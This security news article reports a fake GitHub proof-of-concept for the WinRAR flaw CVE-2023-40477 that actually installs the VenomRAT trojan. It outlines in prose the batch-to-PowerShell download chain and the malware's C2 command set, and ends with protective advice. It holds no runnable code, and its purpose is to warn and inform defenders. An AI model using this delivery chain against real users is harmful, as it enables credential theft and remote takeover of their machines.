A malicious actor has created a fake proof-of-concept (PoC) exploit for a recently patched WinRAR vulnerability and uploaded it to GitHub, hoping to infect unsuspecting researchers and cybercriminals with the VenomRAT malware.
The fake PoC exploit targets the CVE-2023-40477 vulnerability, an arbitrary code execution vulnerability that can be triggered when specially crafted RAR files are opened on WinRAR before version 6.23. Trend Micro’s Zero Day Initiative discovered and disclosed the vulnerability to WinRAR on June 8, 2023, but did not publicly disclose it until August 17, 2023. WinRAR fixed the flaw in version 6.23, which was released on August 2.
The vulnerability is considered notable because WinRAR is a popular Windows file-archiving utility that has over 500 million users worldwide. A successful exploitation of the flaw could allow an attacker to execute arbitrary code on the victim’s system and take full control of it.
Fake PoC Script Delivers VenomRAT
A threat actor operating under the name “whalersplonk” moved fast (4 days) to take advantage of the opportunity by spreading malware under the guise of exploit code for the new WinRAR vulnerability. The attacker uploaded the malicious code to GitHub on August 21, 2023, and included a summary in the README file and a Streamable video demonstrating how to use the PoC, which added further legitimacy to the malicious package.
However, Unit 42, a team of researchers from Palo Alto Networks, reported that the fake Python PoC script is actually a modification of a publicly available exploit for another flaw, CVE-2023-25157, a critical SQL injection flaw impacting GeoServer.
When executed, instead of running the exploit, the PoC creates a batch script that downloads an encoded PowerShell script and executes it on the host. That script downloads the VenomRAT malware and creates a scheduled task to run it every three minutes.
VenomRAT Infections
VenomRAT is a remote access trojan (RAT) that can be used to steal credentials, monitor keystrokes, execute commands, and deploy other payloads on infected devices. It appeared for sale in Dark Web forums in 2022 and has been used in various cyberattacks since then.
Once VenomRAT is launched on a Windows device, it executes a key logger that records all key presses and writes them to a locally stored text file. Next, the malware establishes communication with the command-and-control (C2) server, from where it receives one of the following nine commands for execution on the infected device:
- plu_gin: Activates a registry-stored plugin.
- HVNCStop: Kills “cvtres” process.
- loadofflinelog: Sends offline key logger data from %APPDATA%.
- save_Plugin: Saves a plugin to the registry under a hardware ID.
- runningapp: Displays active processes.
- keylogsetting: Updates the key log file in %APPDATA%.
- init_reg: Deletes subkeys in the Software registry under a hardware ID.
- Po_ng: Measures time between a PING to the C2 server and receiving this command.
- filterinfo: Lists installed apps and active processes from the registry.
As the malware can be used to deploy other payloads and steal credentials, anyone who executed this fake PoC should change their passwords for all sites and environments they have accounts.
How to Protect Yourself from Fake PoCs
The attack is no longer active, but it once again highlights the risks of sourcing PoCs from GitHub and running them without additional scrutiny to ensure they’re safe. The threat actor also used social engineering techniques to lure potential victims by creating a fake Twitter account and posting about the PoC.
To protect yourself from fake PoCs, you should always:
- Verify the source and reputation of the PoC before downloading or executing it.
- Use a sandbox or virtual machine to test the PoC in an isolated environment.
- Use antivirus software and firewall to detect and block malicious activities.
- Update your software regularly to patch known vulnerabilities.